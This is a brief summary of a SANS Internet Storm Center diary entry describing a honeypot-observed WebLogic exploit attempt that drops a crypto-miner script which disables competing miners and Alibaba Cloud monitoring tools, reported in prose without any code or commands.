WebLogic Crypto Miner Malware Disabling Alibaba Cloud Monitoring Tools, (Tue, Apr 5th)

Looking through my honeypot logs for some Spring4Shell exploits (I didn’t find anything interesting), I came across this attempt to exploit an older WebLogic vulnerability (likely %%cve:2020-14882%% or %%cve:2020-14883%%). The exploit itself is “run of the mill,” but the script downloaded is going through an excessively long list of competitors to disable and disabled cloud monitoring tools, likely to make detecting and response more difficult. Many organizations will not notice that they do not receive any more alerts :wink:

Article Link: InfoSec Handlers Diary Blog - SANS Internet Storm Center